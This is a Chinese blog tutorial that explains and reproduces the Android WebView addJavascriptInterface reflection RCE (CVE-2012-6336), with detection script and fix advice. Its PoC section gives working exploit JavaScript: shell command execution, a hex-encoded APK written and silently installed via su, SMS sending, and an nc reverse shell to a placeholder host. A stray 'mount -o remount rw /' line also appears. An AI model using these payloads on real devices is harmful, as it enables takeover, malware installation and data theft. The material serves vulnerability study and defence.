WebView远程代码执行漏洞学习并复现

最新推荐文章于 2021-10-09 14:58:58 发布
原创 最新推荐文章于 2021-10-09 14:58:58 发布 · 8.2k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#webview #漏洞

本文详细解析了Android API Level 16及之前版本中WebView存在的远程代码执行漏洞,阐述了漏洞触发条件、原理,并提供了检测方法和修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一 前言


Android API level 16以及之前的版本存在远程代码执行安全漏洞,该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法,简单的说就是通过addJavascriptInterface给WebView加入一个JavaScript桥接接口,JavaScript通过调用这个接口可以直接操作本地的JAVA接口。
触发前提条件:
使用addJavascriptInterface方法注册可供JavaScript调用的Java对象;
使用WebView加载外部网页或者本地网页;
Android系统版本低于4.2(Android API level 小于17);

二 漏洞原理


1 WebView简介
WebView可以简单理解为一个展示Web页面的界面,同时提供了一些简单的交互功能。在android<4.4中的WebView是基于Webkit实现的。其基本用法如下:
首先在配置文件中添加WebView控件 
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"  
android:layout_width="match_parent"  
android:layout_height="match_parent" >  
<WebView  
android:id="@+id/web_view"  
android:layout_width="match_parent"  
android:layout_height="match_parent" />  
</LinearLayout>
然后在Activity中就可以直接使用了 
 @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.web_view);
        webView.getSettings().setJavaScriptEnabled(true);
        webView.loadUrl("http://www.baidu.com");
    }
这里我们就可以看到,页面上显示了百度首页。
2 漏洞代码实际情况
我们先来看一下漏洞代码 
class JsObejct{
    @javascriptInterface
    public String toString(){
        return  "injectedObject";
    }
}

webView.addJavascriptInterface(new JsObject(), "injectObject"); //新建JsObject,并注入到js的injectObject字符串中
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())"); //webView中访问执行js代码,js中调用injectObject字符串的toString方法,
                                                                // 在后台代码中会被映射到JsObject对象的toString方法。
说明:从代码中我们可以看到,addJavascriptInterface往WebView中注入了一个Java Object,而这个Java Object的方法可以被js访问。通过这种方式,WebView中的js可以和本地App进行通讯,这确实是个很强大的功能。这么做的好处在于本地App逻辑不变的情况下,不需要升级App就可以对程序进行更新,修改相应的Web页面就可以了这里看来一切正常。
3 反射
反射是java语言提供的一种机制,使得java程序可以在运行时检查类、接口、方法和成员。
反射的功能:
对于任意类,可以知道其所有属性和方法;
对于任意对象,可以调用其任意方法;
我们通过以下两个示例来理解反射。
执行对象方法 
import java.lang.reflect.Method;

class Demo{
    private void a1(){
        System.out.println("I am a1");
    }

    public void a2(){
        System.out.println("I am a2");
    }
}
public class hello {
    public static void main(String[] args){
        Demo demo = new Demo();
        Class mObjectClass = demo.getClass();	//获取Class对象
        System.out.println(mObjectClass.getName());
        Method[] methods = mObjectClass.getDeclaredMethods();//获取函数数组
        for (Method method:methods){
            System.out.println("method = "+ method.getName());
        }
        try{
            Object o = mObjectClass.newInstance(); //根据Class实例化对象
            methods[0].setAccessible(true);	
            methods[0].invoke(o);//调用o对象的method[0]方法

        }catch (Throwable e){
            System.out.println(e.toString());

        }
    }
}
输出结果:

由此可以可看到,我们利用反射成功调用了demo中的a2方法。
执行命令 
import java.lang.reflect.Method;

class Demo{
    public void a1(){
        System.out.println("I am a1");
    }

    public void a2(){
        System.out.println("I am a2");
    }
}
public class hello {
    public static void main(String[] args){
        Demo demo = new Demo();
        Class mObjectClass = demo.getClass();
        System.out.println(mObjectClass.getName());
        Method[] methods = mObjectClass.getDeclaredMethods();
        for (Method method:methods){
            System.out.println("method = "+ method.getName());
        }
        try{
            Class c = mObjectClass.forName("java.lang.Runtime");
            Method m = c.getMethod("getRuntime", null);
            m.setAccessible(true);
            Object obj = m.invoke(null,null); //第一个参数为类的实例,第二个参数为相应函数中的参数
            Class c2 = obj.getClass();
            String array = "cmd.exe /k start calc";
            Method n = c2.getMethod("exec", array.getClass());//获得该类中名称为exec,参数类型为String的方法
            n.invoke(obj, new Object[]{array});调用方法n,第一个参数是类的实例,第二个桉树是相应的参数,以数组表示

        }catch (Throwable e){
            System.out.println(e.toString());

        }
    }
}
为了方便测试,在java中调用windows命令来启动计算器。

输出结果:
成功调用计算器。
获得Class对象的方式 
Class c1 = hello.class;
Class c2 = c1.forName("java.lang.Runtime");//这种方式需要处理异常,否则会报错
Class c3 = new hello().getClass();

结论:有了以上的基础,我们知道,拿到对象之后,可以获取类对象,然后通过反射调用任意对象的任意方法。而在我们前面的漏洞代码中,由于访问的页面是不可控的,所以在访问危险页面时,如果页面中的js包含危险调用,如:injectedObject.getClass.forName(‘java.lang.Runtime’).getMethod('getRuntime',null).invoke(null,null).exec(cmd);此时App将会执行该cmd命令。早期的Android版本没有对可以访问的方法作限制,这就是该漏洞的根本成因。

三 检测方法

 在检测某个apk是否包含此漏洞时,我们只需要让它访问一个页面,该页面中的js遍历其windows对象然后判定getClass函数是否存在即可。
js示例代码如下: 
function check(){
	for(var obj in window){
		try{
			if("getClass" in window[obj]){
				try{
					window[obj].getClass();
					document.write('<span style="color:red">'+obj+'</span>');
					document.write('<br/>');
				}catch(e){
					
				}
			}
		}finally{
			
		}
	}	
}
check();
如果存在漏洞,那么在访问该页面时,会显示出其存在的漏洞对象名称。
mount -o remount rw /

四 漏洞POC


1)利用addJavascriptInterface方法注册可供JavaScript调用的java对象,结合反射机制调用Android API getRuntime执行shell命令列出指定文件
js示例代码如下: 
 <script type="text/javascript">
   var i=0;
    function getContents(inputStream)
    {
      var contents = ""+i;
      var b = inputStream.read();
      var i = 1;
      while(b != -1) {
          var bString = String.fromCharCode(b);
          contents += bString;
          contents += "\n"
          b = inputStream.read();
      }
      i=i+1;
      return contents;
     }
    
     function execute(cmdArgs)
     {
      for (var obj in window) {
          console.log(obj);
          if ("getClass" in window[obj]) {
              alert(obj);
              return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
           }
       }
     } 
     
     var res = execute(["/system/bin/sh", "-c", "ls -al /sdcard"]); 
	 document.write(getContents(res.getInputStream()));
</script>
让app访问该页面结果如下:


2)利用addJavascriptInterface方法注册可供JavaScript调用的java对象,结合反射机制调用Android API getRuntime执行shell命令进行挂马:a安装木马应用APK, b 安装执行ELF可执行程序(暂未测试安装apk)
示例代码如下: 
<script type="text/javascript">
function execute(cmdArgs)
     {
         return inject.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);//注意修改为自己的可供调用的java对象名称
     }
     var apk = "\\x50\\x4B\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00\\x62 \\xB9\\x15\\x30\\x3D\\x07\\x01\\x00\\x00\\x7C\\x01\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xD6\\x0D\\x00\\x00\\x4D\\x45\\x54\\x41\\x2D\\x49\\x4E\\x46\\x2F\\x43\\x45\\x52\\x54\\x2E\\x53------------------------------------------------------------ \\x4D\\x45\\x54\\x41\\x2D\\x49\\x4E\\x46\\x2F\\x43\\x45\\x52\\x54\\x2E\\x52\\x53\\x41\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x07\\x00\\x07\\x00\\xBA\\x01\\x00\\x00\\xB6\\x11\\x00\\x00\\x00\\x00";
     execute(["/system/bin/sh","-c","echo '"+apk+"'>/data/data/com.example.hello/fake.png"]);//自己测试的时候注意包名的修改,我测试的apk包名为com.example.hello
     execute(["chmod","755","/data/data/com.example.hello/fake.png"]);//包名修改
     execute(["su","-c","pm install -r /data/data/com.example.hello/fake.png"]);//包名修改
</script>
结果如下:


3) (暂未测试)利用addJavascriptInterface方法注册可供JavaScript调用的java对象,利用反射机制调用Android API sendTextMessage来发送短信。
java代码 
mWebView = new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(this, "injectedObj");
mWebView.loadUrl("file:///android_asset/www/index.html");
EXP的JavaScript代码: 
<html>
   <body>
      <script>
         var objSmsManager =     injectedObj.getClass().forName("android.telephony.SmsManager").getM ethod("getDefault",null).invoke(null,null);
          objSmsManager.sendTextMessage("10086",null,"this message is sent by JS when webview is loading",null,null);
       </script>
   </body>
</html>
4)(暂未测试)利用addJavascriptInterface方法注册可供JavaScript调用的java对象 “injectedObj”,利用反射机制调用Android API getRuntime执行shell命令,达到反弹一个手机端的shell到远程控制端的目的:
EXP的 JavaScript代码: 
<html>
   <body>
      <script>
         function execute(cmdArgs)
         {
             return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
         }
         execute(["/system/bin/sh","-c","rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/system/bin/sh -i 2>&1|nc x.x.x.x 9099 >/tmp/f"]);
       </script>
   </body>
</html>

四 漏洞修复建议


1.使用API Level高于16的Android系统
处于安全考虑,为了 防止Java层的函数被随便调用,Google在4.2版本之后,规定允许被调用的函数必须以@JavascriptInterface进行注解,所以如果某应用依赖的API Level为17或者以上,就不会受该问题的影响(注:Android 4.2中API Level小于17的应用也会受影响。google官方文档使用示例如下: 
class JsObject {
   @JavascriptInterface
   public String toString() { return "injectedObject"; }
}
webView.addJavascriptInterface(new JsObject(), "injectedObject");
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())");

2. API Level小于17的Android系统
建议不要使用addJavascriptInterface接口,以免带来不必要的安全隐患,请参照博文《在Webview中如何让JS与Java安全地互相调用》[6]。
如果一定要使用addJavascriptInterface接口:
1) 如果使用HTTPS协议加载URL,应进行证书校验防止访问的页面被篡改挂马;
2) 如果使用HTTP协议加载URL,应进行白名单过滤、完整性校验等防止访问的页面被篡改;
3) 如果加载本地Html,应将html文件内置在APK中,以及进行对html页面完整性的校验;

3.移除Android系统内部的默认内置接口

WebView远程代码执行相关的漏洞主要有CVE-2012-6336,CVE-2014-1939,CVE-2014-7224, 这些漏洞中最核心的漏洞是CVE-2012-6336,另外两个CVE只是发现了几个默认存在的接口

CVE-2014-1939

java/android/webkit/BrowserFrame.java 使用addJavascriptInterface API并创建了SearchBoxImpl类的对象。攻击者可通过访问searchBoxJavaBridge_接口利用该漏洞执行任意Java代码:

1
removeJavascriptInterface ( "searchBoxJavaBridge_" )

Google Android <= 4.3.1 受到此漏洞的影响

CVE-2014-7224

香港理工大学发现两个新的攻击向量存在于android/webkit/AccessibilityInjector.java中,当系统辅助功能中的任意一项服务被开启后,所有由系统提供的WebView都会被加入两个JS objects,分别是”accessibility” 和”accessibilityTraversal” ,建议移除:

1
2
removeJavascriptInterface ( "accessibility" )
removeJavascriptInterface ( "accessibilityTraversal" )
Google Android < 4.4 受到此漏洞的影响

参考文章



Invision Community 5.0.0至5.0.7前远程代码执行漏洞(CVE-2025-47916)
m0_50125527的博客
05-28 443
Invision Community 是一款功能强大的在线社区平台,提供论坛、内容管理、社交互动和会员系统等一体化解决方案。它支持高度自定义,具备现代化的用户界面和丰富的插件生态,适用于企业、品牌或爱好者构建活跃的在线社区。其核心功能包括实时讨论、内容协作、权限管理和数据分析,帮助用户轻松创建和管理互动性强的数字空间。
[车联网安全自学篇] Android安全之WebView攻防「基础篇」
橙留香Park的博客
04-15 721
也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大少走了弯路,也就错过了风景,无论如何,感谢经历开局啰嗦一句:本篇是基础篇,进阶篇需要等一段时间,涉及知识点太多,脑壳有点看不懂,准备先学其它知识点,后面再补WebView攻防「进阶篇」。本文将介绍 WebView 的基础知识,和使用不当会造成的一些安全隐患,以及如何发现及缓解这些安全隐患,后续的WebView攻防「进阶篇」会更详细的介绍相关攻击以及案例样本复现方式,更加方便同学们对Android 渗透测试的理解在And
关于Android中WebView远程代码执行漏洞浅析
08-27
主要给大家介绍了关于Android中WebView远程代码执行漏洞的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习
WebView 远程代码执行漏洞浅析
feizhixuan46789的专栏
10-15 7531
1. WebView 远程代码执行漏洞描述       Android API level 16以及之前的版本存在远程代码执行安全漏洞,该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法,简单的说就是通过addJavascriptInterface给WebV
Android安全检测 - WebView远程代码执行漏洞(CVE-2012-6336)
qq_35993502的博客
09-22 2803
这一章我们来学习WebView远程代码执行漏洞(CVE-2012-6336)”,了解这个漏洞发生的原因及其应对的方法。 一、漏洞原理 主要引起漏洞的原因是:WebView的addJavascriptInterface方法提供了一个JavaScript调用的Java 对象的接口,Android系统没有对注册Java 类的方法调用的限制,导致攻击者可以利用反射技术来调用执行其它未注册的类。漏洞影响的Android版本为小于等于Android 4.1.2(API Level 16),在Android版本4.1
android安全之webview远程代码执行漏洞
pangjl1982的专栏
04-11 1647
【基础知识】     Webview是Android用于浏览网页的组件,它的接口函数addJavascriptInterface可以实现网页JS与本地JAVA的交互,但是没有限制已注册JAVA类的方法调用,导致可以利用反射机制调用未注册的其它任何JAVA类。     当Android用户访问恶意网页时,会被迫执行系统命令,如安装木马、盗取敏感数据等。   【漏洞重现】
xss漏洞学习小结,详不详细你说了算
MSB_WLAQ的博客
10-09 1034
xss漏洞小结 一、初识XSS 1、什么是XSS XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 coo.
android JSBridge 漏洞挖掘
weixin_40418457的博客
05-06 1048
一、概述 1. JSBridge介绍 什么是JSBridge主要是给 JavaScript 提供调用 Native 功能的接口,让混合开发中的前端部分可以方便地使用 Native 的功能(例如:地址位置、摄像头)。 而且 JSBridge 的功能不止调用 Native 功能这么简单宽泛。实际上,JSBridge 就像其名称中的Bridge的意义一样,是 Native 和非 Native 之间的桥梁,它的核心是构建 Native 和非 Native 间消息通信的通道,而且这个通信的通道是双向的。 双向通信的通
APP漏洞类型
weixin_43801663的博客
07-21 1447
1. 信息泄露漏洞 logcat输出敏感信息 ​ 应用层log敏感信息输出 ​ 应用层System.out.println敏感信息输出 ​ 系统bug异常导致log输出 ​ Native层敏感Log输出 2. 组件越权漏洞 Activity 组件越权 广播越权 3. 中间人劫持 Http造成的中间人劫持 https造成的中间人劫持 UXSS漏洞 浏览器自身的XSS漏洞 4. 远程代码执行漏洞 Webview漏洞 5. Content Provider SQL注入 6. openFile函数目录遍历 7.
Android WebView远程代码执行漏洞简析
jltxgcy的专栏
02-16 5988
0x00    本文参考Android WebView 远程代码执行漏洞简析。代码地址为,https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo。下面我们分析代码。       0x01    首先列出项目工程目录:    MainActivity.java的代码如下:public class MainActi
安卓WebView中接口隐患与手机挂马利用(远程命令执行)
weixin_30756499的博客
09-05 466
安卓应用存在安全漏洞,浏览网站打开链接即可中招。目前有白帽子提交漏洞表明目前安卓平台上的应用普遍存在一个安全漏洞,用户打开一个链接就可导致远程安装恶意应用甚至完全控制用户手机,目前微信,手机QQ,QVOD以及各大手机浏览器均中招 0x00 背景 在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等...
webView远程代码执行漏洞复现
YenKoc的博客
08-31 161
一.概述 这个漏洞只存在于Android API level 16以及之前的版本,系统没有限制使用webView.addJavascriptInterface方法,导致攻击者可以通过使用java 反射API利用该漏洞执行任意java对象的方法,也就是通过addJavascriptInterface给WebView加入一个JavaScript桥接接口,JavaScirpt通过调用这个接口可以直接操...
Android WebView 远程代码执行漏洞
bihansheng2010的博客
12-01 9423
Android的SDK中提供了的WebView组件,用于在应用中嵌入一个浏览器来进行网页浏览。 WebView组件中的addJavascriptInterface方法可以用于实现本地Java和JavaScript的交互。但是这个方法存在远程代码执行漏洞远程攻击者利用此漏洞能实现本地java和js的交互,可对Android移动终端进行网页挂马从而控制受影响设备。
Webview远程代码执行
xbt312的专栏
09-17 320
APKtools反编译后,查看该应用SDK版本号小于17
Android Webview 漏洞复现
比格沃斯的博客
12-02 1155
Andoid Webview 漏洞复现前言触发条件漏洞原理漏洞复现1. 运行环境2.1 webview介绍2.2 漏洞核心代码2.3 JS攻击核心代码2.4 效果展示 前言 Android API level 16以及之前的版本存在远程代码执行安全漏洞。该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法。 总结起来说,就是通过addJavascriptInterface
CVE-2013-4710 WebView addJavascriptInterface远程执行代码
weixin_30247781的博客
09-22 461
WebView是Android平台下的一个重要组件,通常用来在Activity中嵌入一个简单的浏览器,实现在线网页浏览的功能。比如下面代码实现访问Google页面: WebView webView = new WebView (R.id.webView1); webView.getSettings().setJavaScriptEnabled(true); webView.load...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值